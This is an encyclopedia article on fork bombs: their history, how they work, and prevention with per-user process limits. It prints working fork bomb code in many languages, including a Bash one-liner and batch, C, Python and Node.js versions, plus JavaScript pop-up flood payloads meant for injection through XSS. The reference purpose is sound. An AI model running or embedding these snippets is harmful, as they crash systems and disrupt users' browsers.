Fork bomb
In computing, a fork bomb (also called rabbit virus or wabbit[1]) is a denial-of-service attack wherein a process continually replicates itself to deplete available system resources, slowing down or crashing the system due to resource starvation.
History
Around 1978 an early variant of a fork bomb called wabbit was reported to run on a System/360. It may have descended from a similar attack called RABBITS reported from 1969 on a Burroughs 5500 at the University of Washington.[1]
Implementation
Fork bombs operate both by consuming CPU time in the process of forking, and by saturating the operating system's process table.[2][3] A basic implementation of a fork bomb is an infinite loop that repeatedly launches the same process.
In Unix-like operating systems, fork bombs are generally written to use the fork system call.[3] As forked processes are also copies of the first program, once they resume execution from the next address at the frame pointer, they also seek to create a copy of themselves; this has the effect of causing an exponential growth in processes. As modern Unix systems generally use copy-on-write when forking new processes,[4] a fork bomb generally will not saturate such a system's memory.
Microsoft Windows operating systems do not have an equivalent functionality to the Unix fork system call;[5] a fork bomb on such an operating system must therefore create a new process instead of forking from an existing one.
Examples of fork bombs
A fork bomb using the Bash shell:
:(){ :|:& };:
(The trick here is that ":" is a function name - otherwise it is identical to bomb(){ bomb|bomb& }; bomb)
Same as above, but encoded into a standalone shell script as opposed to a shell function:
#!/bin/bash
./$0|./$0&
A fork bomb using the Microsoft Windows batch language:
:s
start "" %0
goto s
The same as above, but shorter:
%0|%0
The same as above, but done in command line using ^ to escape specials:
echo %0^|%0 > forkbomb.bat
forkbomb.bat
An inline shell example using the Perl interpreter:
perl -e "fork while fork" &
Using Python:
import os
while 1:
os.fork()
Using Java:
public class ForkBomb
{
public static void main(String[] args)
{
while(true)
{
Runtime.getRuntime().exec(new String[]{"javaw", "-cp", System.getProperty("java.class.path"), "ForkBomb"});
}
}
}
Using Ruby:
loop { fork { load(__FILE__) } }
Or using Haskell:
import Control.Monad (forever)
import System.Posix.Process (forkProcess)
forkBomb = forever $ forkProcess forkBomb
main = forkBomb
Or using Common Lisp (Clozure CL):
(loop (#_fork))
Or in C:
#include <unistd.h>
int main(void)
{
while(1) {
fork(); /* malloc can be used in order to increase the data usage */
}
}
Or in Intel Assembly (on 32-bit Linux):
section .text
global _start
_start:
mov eax,2 ;System call for forking
int 0x80 ;Call kernel
jmp _start
In .NET using C#:
static void Main()
{
while (true) Process.Start(Assembly.GetExecutingAssembly().Location);
}
Also in VB.net:
Do
System.Diagnostics.Process.Start(System.Reflection.Assembly.GetExecutingAssembly().Location)
Loop While True
JavaScript code that can be injected into a Web page via an XSS vulnerability exploit, resulting in a series of infinitely forking pop-up windows:
<script>
while (true) {
var w = window.open();
w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML);
}
</script>
Or, an easier-to-inject, harder-to-censor version of the above that uses an event spoofing attack:
<a href="#" onload="function() { while (true) { var w = window.open(); w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML); } }">XSS fork bomb</a>
Or, a more aggressive version:
<script>
setInterval(function() {
var w = window.open();
w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML);
}, 10);
</script>
In Node.js, using JavaScript:
(function f() { require('child_process').spawn(process.argv[0], ['-e', '(' + f.toString() + '());']); }());
One can run this using shell, similar to approach it uses in inside:
node -e "(function f() { require('child_process').spawn(process.argv[0], ['-e', '(' + f.toString() + '());']); }());"
Prevention
As a fork bomb's mode of operation is entirely encapsulated by creating new processes, one way of preventing a fork bomb from severely affecting the entire system is to limit the maximum number of processes that a single user may own. On Linux, this can be achieved by using the ulimit utility; for example, the command ulimit -u 30
would limit the affected user to a maximum of thirty owned processes.[6] On PAM-enabled systems, this limit can also be set in /etc/security/limits.conf
,[7] and on FreeBSD, the system administrator can put limits in /etc/login.conf
.[8]
See also
References
- 1 2 Raymond, Eric S. (October 1, 2004). "wabbit". The Jargon Lexicon. Retrieved October 15, 2013.
- ↑ Ye, Nong (2008). Secure Computer and Network Systems: Modeling, Analysis and Design. p. 16. ISBN 0470023244.
- 1 2 Jielin, Dong (2007). Network Dictionary. p. 200. ISBN 1602670005.
- ↑ Dhamdhere, D. M. (2006). Operating Systems: A Concept-based Approach. p. 285. ISBN 0070611947.
- ↑ Hammond, Mark (2000). Python Programming On Win32: Help for Windows Programmers. p. 35. ISBN 1565926218.
- ↑ Cooper, Mendel (2005). Advanced Bash Scripting Guide. pp. 305–306. ISBN 1430319305.
- ↑ Soyinka, Wale (2012). Linux Administration: A Beginners Guide. pp. 364–365. ISBN 0071767592.
- ↑ Lucas, Michael W. (2007). Absolute FreeBSD: The Complete Guide to FreeBSD. pp. 198–199. ISBN 1593271514.